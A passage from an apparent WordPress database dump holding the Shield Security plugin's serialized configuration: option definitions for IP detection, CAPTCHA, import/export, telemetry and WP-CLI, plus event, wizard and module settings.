Options\";}i:2;a:4:{s:4:\"slug\";s:27:\"section_third_party_captcha\";s:5:\"title\";s:7:\"CAPTCHA\";s:11:\"title_short\";s:7:\"CAPTCHA\";s:9:\"beacon_id\";i:390;}i:3;a:4:{s:4:\"slug\";s:20:\"section_importexport\";s:5:\"title\";s:15:\"Import / Export\";s:11:\"title_short\";s:15:\"Import / Export\";s:9:\"beacon_id\";i:129;}i:4;a:3:{s:4:\"slug\";s:20:\"section_integrations\";s:5:\"title\";s:12:\"Integrations\";s:11:\"title_short\";s:12:\"Integrations\";}i:5;a:3:{s:4:\"slug\";s:31:\"section_global_security_options\";s:5:\"title\";s:30:\"Global Plugin Security Options\";s:11:\"title_short\";s:14:\"Disable Shield\";}i:6;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:33:{s:29:\"global_enable_plugin_features\";a:10:{s:3:\"key\";s:29:\"global_enable_plugin_features\";s:7:\"section\";s:31:\"section_global_security_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:389;s:4:\"name\";s:33:\"Enable/Disable All Plugin Modules\";s:7:\"summary\";s:27:\"Global Plugin On/Off Switch\";s:11:\"description\";s:50:\"Uncheck this option to disable all Shield features\";}s:15:\"enable_tracking\";a:9:{s:3:\"key\";s:15:\"enable_tracking\";s:7:\"section\";s:30:\"section_general_plugin_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/7i\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:28:\"Enable Information Gathering\";s:7:\"summary\";s:44:\"Permit Anonymous Usage Information Gathering\";s:11:\"description\";s:198:\"Allows us to gather information on statistics and features in-use across our client installations. This information is strictly anonymous and contains no personally, or otherwise, identifiable data.\";}s:16:\"enable_shieldnet\";a:11:{s:3:\"key\";s:16:\"enable_shieldnet\";s:7:\"section\";s:30:\"section_general_plugin_options\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"beacon_id\";i:437;s:9:\"link_info\";s:19:\"https://shsec.io/kb\";s:9:\"link_blog\";s:19:\"https://shsec.io/kc\";s:4:\"name\";s:16:\"Enable ShieldNET\";s:7:\"summary\";s:54:\"Enhanced Website Security Through Network Intelligence\";s:11:\"description\";s:55:\"Enhanced Website Security Through Network Intelligence.\";}s:13:\"show_advanced\";a:9:{s:3:\"key\";s:13:\"show_advanced\";s:7:\"section\";s:14:\"section_non_ui\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Show All Options\";s:7:\"summary\";s:51:\"Show All Options Including Those Marked As Advanced\";s:11:\"description\";s:122:\"Shield hides advanced options from view to simplify display. Turn this option on to display advanced options at all times.\";}s:22:\"visitor_address_source\";a:13:{s:3:\"key\";s:22:\"visitor_address_source\";s:7:\"section\";s:16:\"section_defaults\";s:8:\"advanced\";b:1;s:9:\"sensitive\";b:0;s:4:\"type\";s:6:\"select\";s:7:\"default\";s:14:\"AUTO_DETECT_IP\";s:13:\"value_options\";a:11:{i:0;a:2:{s:9:\"value_key\";s:14:\"AUTO_DETECT_IP\";s:4:\"text\";s:31:\"Automatically Detect Visitor IP\";}i:1;a:2:{s:9:\"value_key\";s:11:\"REMOTE_ADDR\";s:4:\"text\";s:11:\"REMOTE_ADDR\";}i:2;a:2:{s:9:\"value_key\";s:21:\"HTTP_CF_CONNECTING_IP\";s:4:\"text\";s:21:\"HTTP_CF_CONNECTING_IP\";}i:3;a:2:{s:9:\"value_key\";s:20:\"HTTP_X_FORWARDED_FOR\";s:4:\"text\";s:20:\"HTTP_X_FORWARDED_FOR\";}i:4;a:2:{s:9:\"value_key\";s:16:\"HTTP_X_FORWARDED\";s:4:\"text\";s:16:\"HTTP_X_FORWARDED\";}i:5;a:2:{s:9:\"value_key\";s:14:\"HTTP_X_REAL_IP\";s:4:\"text\";s:14:\"HTTP_X_REAL_IP\";}i:6;a:2:{s:9:\"value_key\";s:22:\"HTTP_X_SUCURI_CLIENTIP\";s:4:\"text\";s:22:\"HTTP_X_SUCURI_CLIENTIP\";}i:7;a:2:{s:9:\"value_key\";s:20:\"HTTP_INCAP_CLIENT_IP\";s:4:\"text\";s:20:\"HTTP_INCAP_CLIENT_IP\";}i:8;a:2:{s:9:\"value_key\";s:22:\"HTTP_X_SP_FORWARDED_IP\";s:4:\"text\";s:22:\"HTTP_X_SP_FORWARDED_IP\";}i:9;a:2:{s:9:\"value_key\";s:14:\"HTTP_FORWARDED\";s:4:\"text\";s:14:\"HTTP_FORWARDED\";}i:10;a:2:{s:9:\"value_key\";s:14:\"HTTP_CLIENT_IP\";s:4:\"text\";s:14:\"HTTP_CLIENT_IP\";}}s:9:\"link_info\";s:19:\"https://shsec.io/dn\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:391;s:4:\"name\";s:18:\"Visitor IP Address\";s:7:\"summary\";s:22:\"Which Address Is Yours\";s:11:\"description\";s:85:\"There are many way to detect visitor IP addresses. Please select yours from the list.\";}s:24:\"block_send_email_address\";a:10:{s:3:\"key\";s:24:\"block_send_email_address\";s:7:\"section\";s:16:\"section_defaults\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Report Email\";s:7:\"summary\";s:27:\"Where to send email reports\";s:11:\"description\";s:66:\"If this is empty, it will default to the blog admin email address.\";}s:27:\"enable_upgrade_admin_notice\";a:9:{s:3:\"key\";s:27:\"enable_upgrade_admin_notice\";s:7:\"section\";s:30:\"section_general_plugin_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"In-Plugin Notices\";s:7:\"summary\";s:31:\"Display Plugin Specific Notices\";s:11:\"description\";s:105:\"Disable this option to hide certain plugin admin notices about available updates and post-update notices.\";}s:12:\"enable_wpcli\";a:12:{s:3:\"key\";s:12:\"enable_wpcli\";s:7:\"section\";s:30:\"section_general_plugin_options\";s:8:\"advanced\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/i1\";s:9:\"link_blog\";s:19:\"https://shsec.io/i2\";s:9:\"beacon_id\";i:308;s:4:\"name\";s:12:\"Allow WP-CLI\";s:7:\"summary\";s:50:\"Allow Access And Control Of This Plugin Via WP-CLI\";s:11:\"description\";s:65:\"Turn off this option to disable this plugin\'s WP-CLI integration.\";}s:20:\"display_plugin_badge\";a:10:{s:3:\"key\";s:20:\"display_plugin_badge\";s:7:\"section\";s:30:\"section_general_plugin_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/5v\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf20\";s:9:\"beacon_id\";i:130;s:4:\"name\";s:17:\"Show Plugin Badge\";s:7:\"summary\";s:42:\"Display Plugin Security Badge On Your Site\";s:11:\"description\";s:187:\"Enabling this option helps support the plugin by spreading the word about it on your website. The plugin badge also demonstrates to visitors that you take your website security seriously.\";}s:27:\"enable_xmlrpc_compatibility\";a:9:{s:3:\"key\";s:27:\"enable_xmlrpc_compatibility\";s:7:\"section\";s:16:\"section_defaults\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:21:\"XML-RPC Compatibility\";s:7:\"summary\";s:56:\"Allow Login Through XML-RPC To By-Pass Login Guard Rules\";s:11:\"description\";s:95:\"Enable this if you need XML-RPC functionality e.g. if you use the WordPress iPhone/Android App.\";}s:19:\"importexport_enable\";a:12:{s:3:\"key\";s:19:\"importexport_enable\";s:7:\"section\";s:20:\"section_importexport\";s:8:\"advanced\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/do\";s:9:\"link_blog\";s:19:\"https://shsec.io/dp\";s:9:\"beacon_id\";i:129;s:4:\"name\";s:19:\"Allow Import/Export\";s:7:\"summary\";s:65:\"Allow Import Of Options To, And Export Of Options From, This Site\";s:11:\"description\";s:68:\"Uncheck this box to completely disable import and export of options.\";}s:22:\"importexport_masterurl\";a:10:{s:3:\"key\";s:22:\"importexport_masterurl\";s:7:\"section\";s:20:\"section_importexport\";s:8:\"advanced\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Auto-Import URL\";s:7:\"summary\";s:43:\"Automatically Import Options From This Site\";s:11:\"description\";s:115:\"Supplying a valid site URL here will make this site an \'Options Slave\' and will automatically import options daily.\";}s:22:\"importexport_whitelist\";a:12:{s:3:\"key\";s:22:\"importexport_whitelist\";s:7:\"section\";s:20:\"section_importexport\";s:8:\"advanced\";b:1;s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:7:\"default\";a:0:{}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Export Whitelist\";s:7:\"summary\";s:68:\"Whitelisted Sites Which Do Not Need The Secret Key To Export Options\";s:11:\"description\";s:132:\"Each site on this list will be able to export options from this site without providing the secret key. Take a new line for each URL.\";}s:29:\"importexport_whitelist_notify\";a:11:{s:3:\"key\";s:29:\"importexport_whitelist_notify\";s:7:\"section\";s:20:\"section_importexport\";s:8:\"advanced\";b:1;s:9:\"sensitive\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Notify Whitelist\";s:7:\"summary\";s:59:\"Notify Sites On The Whitelist To Update Options From Master\";s:11:\"description\";s:110:\"When enabled, manual options saving will notify sites on the whitelist to export options from the Master site.\";}s:22:\"importexport_secretkey\";a:12:{s:3:\"key\";s:22:\"importexport_secretkey\";s:7:\"section\";s:20:\"section_importexport\";s:8:\"advanced\";b:1;s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:16:\"noneditable_text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:10:\"Secret Key\";s:7:\"summary\";s:24:\"Import/Export Secret Key\";s:11:\"description\";s:79:\"Keep this Secret Key private as it will allow the import and export of options.\";}s:20:\"delete_on_deactivate\";a:9:{s:3:\"key\";s:20:\"delete_on_deactivate\";s:7:\"section\";s:30:\"section_general_plugin_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Delete Plugin Settings\";s:7:\"summary\";s:51:\"Delete All Plugin Settings Upon Plugin Deactivation\";s:11:\"description\";s:67:\"Careful: Removes all plugin options when you deactivate the plugin.\";}s:15:\"locale_override\";a:10:{s:3:\"key\";s:15:\"locale_override\";s:7:\"section\";s:30:\"section_general_plugin_options\";s:8:\"advanced\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:18:\"https://icwp.io/il\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Locale Override\";s:7:\"summary\";s:51:\"Delete All Plugin Settings Upon Plugin Deactivation\";s:11:\"description\";s:67:\"Careful: Removes all plugin options when you deactivate the plugin.\";}s:16:\"captcha_provider\";a:11:{s:3:\"key\";s:16:\"captcha_provider\";s:7:\"section\";s:27:\"section_third_party_captcha\";s:7:\"default\";s:10:\"grecaptcha\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:2:{i:0;a:2:{s:9:\"value_key\";s:10:\"grecaptcha\";s:4:\"text\";s:19:\"Google reCAPTCHA v2\";}i:1;a:2:{s:9:\"value_key\";s:8:\"hcaptcha\";s:4:\"text\";s:8:\"hCaptcha\";}}s:9:\"link_info\";s:19:\"https://shsec.io/dq\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:269;s:4:\"name\";s:16:\"CAPTCHA Provider\";s:7:\"summary\";s:40:\"Which CAPTCHA Provider To Use Throughout\";s:11:\"description\";s:66:\"You can choose the CAPTCHA provider depending on your preferences.\";}s:22:\"google_recaptcha_style\";a:12:{s:3:\"key\";s:22:\"google_recaptcha_style\";s:7:\"section\";s:27:\"section_third_party_captcha\";s:7:\"premium\";b:1;s:7:\"default\";s:5:\"light\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:5:\"light\";s:4:\"text\";s:11:\"Light Theme\";}i:1;a:2:{s:9:\"value_key\";s:4:\"dark\";s:4:\"text\";s:10:\"Dark Theme\";}i:2;a:2:{s:9:\"value_key\";s:9:\"invisible\";s:4:\"text\";s:9:\"Invisible\";}}s:9:\"link_info\";s:19:\"https://shsec.io/dq\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:269;s:4:\"name\";s:12:\"CAPTCHA Type\";s:7:\"summary\";s:49:\"How Google reCAPTCHA Will Be Displayed By Default\";s:11:\"description\";s:109:\"You can choose the reCAPTCHA display format that best suits your site, including the new Invisible Recaptcha.\";}s:25:\"google_recaptcha_site_key\";a:11:{s:3:\"key\";s:25:\"google_recaptcha_site_key\";s:7:\"section\";s:27:\"section_third_party_captcha\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:22:\"https://shsec.io/shld5\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:390;s:4:\"name\";s:18:\"reCAPTCHA Site Key\";s:7:\"summary\";s:67:\"Google reCAPTCHA Site Key - Only v2 or Invisible. v3 NOT supported.\";s:11:\"description\";s:67:\"Enter your Google reCAPTCHA site key for use throughout the plugin.\";}s:27:\"google_recaptcha_secret_key\";a:11:{s:3:\"key\";s:27:\"google_recaptcha_secret_key\";s:7:\"section\";s:27:\"section_third_party_captcha\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:22:\"https://shsec.io/shld5\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:390;s:4:\"name\";s:16:\"reCAPTCHA Secret\";s:7:\"summary\";s:69:\"Google reCAPTCHA Secret Key - Only v2 or Invisible. v3 NOT supported.\";s:11:\"description\";s:69:\"Enter your Google reCAPTCHA secret key for use throughout the plugin.\";}s:21:\"tracking_last_sent_at\";a:6:{s:3:\"key\";s:21:\"tracking_last_sent_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;s:3:\"min\";i:0;}s:22:\"unique_installation_id\";a:5:{s:3:\"key\";s:22:\"unique_installation_id\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:4:\"text\";s:7:\"default\";i:0;}s:26:\"tracking_permission_set_at\";a:4:{s:3:\"key\";s:26:\"tracking_permission_set_at\";s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}s:17:\"installation_time\";a:5:{s:3:\"key\";s:17:\"installation_time\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}s:12:\"activated_at\";a:5:{s:3:\"key\";s:12:\"activated_at\";s:12:\"transferable\";b:0;s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}s:33:\"importexport_secretkey_expires_at\";a:5:{s:3:\"key\";s:33:\"importexport_secretkey_expires_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}s:33:\"importexport_handshake_expires_at\";a:5:{s:3:\"key\";s:33:\"importexport_handshake_expires_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}s:21:\"last_ip_detect_source\";a:5:{s:3:\"key\";s:21:\"last_ip_detect_source\";s:12:\"transferable\";b:0;s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}s:19:\"openssl_private_key\";a:6:{s:3:\"key\";s:19:\"openssl_private_key\";s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}s:10:\"snapi_data\";a:6:{s:3:\"key\";s:10:\"snapi_data\";s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}s:18:\"captcha_checked_at\";a:5:{s:3:\"key\";s:18:\"captcha_checked_at\";s:12:\"transferable\";b:0;s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:3:\"int\";s:7:\"default\";i:-1;}s:20:\"cache_dir_write_test\";a:5:{s:3:\"key\";s:20:\"cache_dir_write_test\";s:12:\"transferable\";b:0;s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}}s:11:\"definitions\";a:6:{s:19:\"href_privacy_policy\";s:38:\"https://shsec.io/wpshieldprivacypolicy\";s:10:\"db_classes\";a:1:{s:5:\"notes\";s:69:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\AdminNotes\\Handler\";}s:14:\"db_table_notes\";a:3:{s:4:\"slug\";s:5:\"notes\";s:14:\"has_updated_at\";b:1;s:11:\"cols_custom\";a:2:{s:11:\"wp_username\";s:39:\"varchar(255) NOT NULL DEFAULT \'unknown\'\";s:4:\"note\";s:4:\"TEXT\";}}s:22:\"active_plugin_features\";a:21:{i:0;a:2:{s:4:\"slug\";s:4:\"data\";s:13:\"load_priority\";i:1;}i:1;a:3:{s:4:\"slug\";s:8:\"insights\";s:13:\"load_priority\";i:2;s:13:\"menu_priority\";i:5;}i:2;a:3:{s:4:\"slug\";s:24:\"admin_access_restriction\";s:9:\"namespace\";s:13:\"SecurityAdmin\";s:13:\"load_priority\";i:11;}i:3;a:3:{s:4:\"slug\";s:3:\"ips\";s:13:\"load_priority\";i:15;s:9:\"namespace\";s:3:\"IPs\";}i:4;a:3:{s:4:\"slug\";s:11:\"audit_trail\";s:13:\"load_priority\";i:11;s:6:\"hidden\";b:0;}i:5;a:2:{s:4:\"slug\";s:12:\"hack_protect\";s:9:\"namespace\";s:9:\"HackGuard\";}i:6;a:2:{s:4:\"slug\";s:7:\"traffic\";s:13:\"load_priority\";i:12;}i:7;a:2:{s:4:\"slug\";s:8:\"firewall\";s:13:\"load_priority\";i:1000;}i:8;a:3:{s:4:\"slug\";s:13:\"login_protect\";s:11:\"storage_key\";s:12:\"loginprotect\";s:9:\"namespace\";s:10:\"LoginGuard\";}i:9;a:1:{s:4:\"slug\";s:15:\"user_management\";}i:10;a:2:{s:4:\"slug\";s:15:\"comments_filter\";s:11:\"storage_key\";s:14:\"commentsfilter\";}i:11;a:2:{s:4:\"slug\";s:6:\"events\";s:13:\"load_priority\";i:11;}i:12;a:2:{s:4:\"slug\";s:9:\"reporting\";s:13:\"load_priority\";i:12;}i:13;a:2:{s:4:\"slug\";s:8:\"sessions\";s:13:\"load_priority\";i:5;}i:14;a:2:{s:4:\"slug\";s:12:\"integrations\";s:13:\"load_priority\";i:20;}i:15;a:2:{s:4:\"slug\";s:7:\"license\";s:13:\"load_priority\";i:10;}i:16;a:1:{s:4:\"slug\";s:11:\"autoupdates\";}i:17;a:1:{s:4:\"slug\";s:7:\"headers\";}i:18;a:1:{s:4:\"slug\";s:8:\"lockdown\";}i:19;a:1:{s:4:\"slug\";s:5:\"comms\";}i:20;a:1:{s:4:\"slug\";s:5:\"email\";}}s:6:\"events\";a:15:{s:9:\"debug_log\";a:3:{s:12:\"audit_params\";a:1:{i:0;s:7:\"message\";}s:5:\"level\";s:5:\"debug\";s:4:\"stat\";b:0;}s:13:\"test_cron_run\";a:2:{s:5:\"level\";s:5:\"debug\";s:6:\"recent\";b:1;}s:18:\"import_notify_sent\";a:2:{s:5:\"level\";s:5:\"debug\";s:4:\"stat\";b:0;}s:22:\"import_notify_received\";a:3:{s:12:\"audit_params\";a:1:{i:0;s:11:\"master_site\";}s:5:\"level\";s:6:\"notice\";s:4:\"stat\";b:0;}s:16:\"options_exported\";a:4:{s:12:\"audit_params\";a:1:{i:0;s:4:\"site\";}s:5:\"level\";s:6:\"notice\";s:4:\"stat\";b:1;s:6:\"recent\";b:1;}s:16:\"options_imported\";a:4:{s:12:\"audit_params\";a:1:{i:0;s:4:\"site\";}s:5:\"level\";s:6:\"notice\";s:4:\"stat\";b:1;s:6:\"recent\";b:1;}s:20:\"whitelist_site_added\";a:3:{s:12:\"audit_params\";a:1:{i:0;s:4:\"site\";}s:5:\"level\";s:7:\"warning\";s:4:\"stat\";b:0;}s:22:\"whitelist_site_removed\";a:3:{s:12:\"audit_params\";a:1:{i:0;s:4:\"site\";}s:5:\"level\";s:6:\"notice\";s:4:\"stat\";b:0;}s:14:\"master_url_set\";a:3:{s:12:\"audit_params\";a:1:{i:0;s:4:\"site\";}s:5:\"level\";s:7:\"warning\";s:4:\"stat\";b:0;}s:17:\"recaptcha_success\";a:1:{s:5:\"level\";s:5:\"debug\";}s:14:\"recaptcha_fail\";a:2:{s:5:\"level\";s:7:\"warning\";s:5:\"audit\";b:1;}s:12:\"antibot_pass\";a:3:{s:12:\"audit_params\";a:2:{i:0;s:5:\"score\";i:1;s:7:\"minimum\";}s:5:\"level\";s:4:\"info\";s:4:\"stat\";b:1;}s:12:\"antibot_fail\";a:3:{s:12:\"audit_params\";a:2:{i:0;s:5:\"score\";i:1;s:7:\"minimum\";}s:5:\"level\";s:7:\"warning\";s:4:\"stat\";b:1;}s:14:\"frontpage_load\";a:3:{s:5:\"level\";s:5:\"debug\";s:7:\"offense\";b:0;s:4:\"stat\";b:0;}s:14:\"loginpage_load\";a:3:{s:5:\"level\";s:5:\"debug\";s:7:\"offense\";b:0;s:4:\"stat\";b:0;}}s:7:\"wizards\";a:1:{s:7:\"welcome\";a:4:{s:5:\"title\";s:28:\"Getting Started Setup Wizard\";s:4:\"desc\";s:106:\"An introduction to this security plugin, helping you get setup and started quickly with the core features.\";s:20:\"min_user_permissions\";s:14:\"manage_options\";s:5:\"steps\";a:12:{s:7:\"welcome\";a:2:{s:14:\"security_admin\";b:0;s:5:\"title\";s:7:\"Welcome\";}s:9:\"ip_detect\";a:1:{s:5:\"title\";s:12:\"IP Detection\";}s:24:\"admin_access_restriction\";a:1:{s:5:\"title\";s:14:\"Security Admin\";}s:11:\"audit_trail\";a:1:{s:5:\"title\";s:11:\"Audit Trail\";}s:3:\"ips\";a:1:{s:5:\"title\";s:12:\"IP Blacklist\";}s:13:\"login_protect\";a:1:{s:5:\"title\";s:16:\"Login Protection\";}s:15:\"comments_filter\";a:1:{s:5:\"title\";s:12:\"Comment SPAM\";}s:12:\"plugin_badge\";a:1:{s:5:\"title\";s:14:\"Security Badge\";}s:16:\"plugin_telemetry\";a:1:{s:5:\"title\";s:16:\"Plugin Telemetry\";}s:10:\"free_trial\";a:1:{s:5:\"title\";s:10:\"Free Trial\";}s:5:\"optin\";a:1:{s:5:\"title\";s:8:\"Join Us!\";}s:8:\"thankyou\";a:2:{s:14:\"security_admin\";b:0;s:5:\"title\";s:10:\"Thank You!\";}}}}}s:4:\"meta\";a:1:{s:6:\"ts_mod\";i:1632315670;}}','no'),(510330,'_site_transient_timeout_shield_mod_config_data','1632920474','no'),(510331,'_site_transient_shield_mod_config_data','a:7:{s:4:\"slug\";s:4:\"data\";s:10:\"properties\";a:12:{s:4:\"slug\";s:4:\"data\";s:4:\"name\";s:4:\"Data\";s:21:\"show_module_menu_item\";b:0;s:12:\"auto_enabled\";b:1;s:11:\"storage_key\";s:4:\"data\";s:12:\"show_central\";b:0;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:12:\"run_if_wpcli\";b:1;s:14:\"skip_processor\";b:1;s:16:\"tracking_exclude\";b:1;}s:5:\"wpcli\";a:1:{s:7:\"enabled\";b:0;}s:8:\"sections\";a:0:{}s:7:\"options\";a:0:{}s:11:\"definitions\";a:3:{s:18:\"db_handler_classes\";a:2:{s:3:\"ips\";s:72:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Modules\\Data\\DB\\IPs\\Ops\\Handler\";s:8:\"req_logs\";s:76:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Modules\\Data\\DB\\ReqLogs\\Ops\\Handler\";}s:12:\"db_table_ips\";a:6:{s:10:\"autoexpire\";i:0;s:4:\"slug\";s:3:\"ips\";s:14:\"has_updated_at\";b:0;s:14:\"has_deleted_at\";b:0;s:14:\"col_older_than\";s:10:\"created_at\";s:11:\"cols_custom\";a:2:{s:2:\"ip\";a:2:{s:10:\"macro_type\";s:2:\"ip\";s:4:\"attr\";a:1:{i:0;s:6:\"UNIQUE\";}}s:3:\"geo\";a:2:{s:10:\"macro_type\";s:4:\"meta\";s:7:\"comment\";s:10:\"GeoIP Data\";}}}s:17:\"db_table_req_logs\";a:5:{s:4:\"slug\";s:8:\"req_logs\";s:10:\"autoexpire\";i:0;s:14:\"has_updated_at\";b:0;s:14:\"has_deleted_at\";b:0;s:11:\"cols_custom\";a:3:{s:6:\"req_id\";a:3:{s:10:\"macro_type\";s:7:\"varchar\";s:6:\"length\";i:10;s:4:\"attr\";a:1:{i:0;s:6:\"UNIQUE\";}}s:6:\"ip_ref\";a:2:{s:10:\"macro_type\";s:14:\"foreign_key_id\";s:11:\"foreign_key\";a:1:{s:9:\"ref_table\";s:13:\"icwp_wpsf_ips\";}}s:4:\"meta\";a:1:{s:10:\"macro_type\";s:4:\"meta\";}}}}s:4:\"meta\";a:1:{s:6:\"ts_mod\";i:1632315670;}}','no'),(510332,'_site_transient_timeout_shield_mod_config_insights','1632920474','no'),(510333,'_site_transient_shield_mod_config_insights','a:6:{s:4:\"slug\";s:8:\"insights\";s:10:\"properties\";a:16:{s:4:\"slug\";s:8:\"insights\";s:4:\"name\";s:9:\"Dashboard\";s:10:\"menu_title\";s:18:\"Security Dashboard\";s:13:\"menu_priority\";s:1:\"5\";s:21:\"show_module_menu_item\";b:1;s:19:\"show_module_options\";b:0;s:12:\"auto_enabled\";b:1;s:11:\"storage_key\";s:8:\"insights\";s:12:\"show_central\";b:0;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;s:14:\"skip_processor\";b:1;s:16:\"tracking_exclude\";b:1;}s:5:\"wpcli\";a:1:{s:7:\"enabled\";b:0;}s:8:\"sections\";a:1:{i:0;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:0:{}s:4:\"meta\";a:1:{s:6:\"ts_mod\";i:1632315670;}}','no'),(510334,'_site_transient_timeout_shield_mod_config_admin_access_restriction','1632920474','no'),(510335,'_site_transient_shield_mod_config_admin_access_restriction','a:8:{s:4:\"slug\";s:24:\"admin_access_restriction\";s:10:\"properties\";a:14:{s:4:\"slug\";s:24:\"admin_access_restriction\";s:4:\"name\";s:14:\"Security Admin\";s:12:\"sidebar_name\";s:14:\"Security Admin\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:24:\"admin_access_restriction\";s:7:\"tagline\";s:58:\"Protect your Security Plugin, not just your WordPress site\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:20;}s:5:\"wpcli\";a:1:{s:4:\"root\";s:8:\"secadmin\";}s:13:\"admin_notices\";a:2:{s:26:\"certain-options-restricted\";a:5:{s:2:\"id\";s:26:\"certain-options-restricted\";s:8:\"schedule\";s:10:\"conditions\";s:12:\"plugin_admin\";s:2:\"no\";s:8:\"per_user\";b:1;s:4:\"type\";s:7:\"warning\";}s:22:\"admin-users-restricted\";a:5:{s:2:\"id\";s:22:\"admin-users-restricted\";s:8:\"schedule\";s:10:\"conditions\";s:12:\"plugin_admin\";s:2:\"no\";s:4:\"type\";s:7:\"warning\";s:8:\"per_user\";b:1;}}s:8:\"sections\";a:5:{i:0;a:6:{s:4:\"slug\";s:31:\"section_security_admin_settings\";s:7:\"primary\";b:1;s:5:\"title\";s:35:\"Security Admin Restriction Settings\";s:11:\"title_short\";s:23:\"Security Admin Settings\";s:9:\"beacon_id\";i:215;s:7:\"summary\";a:2:{i:0;s:52:\"Purpose - 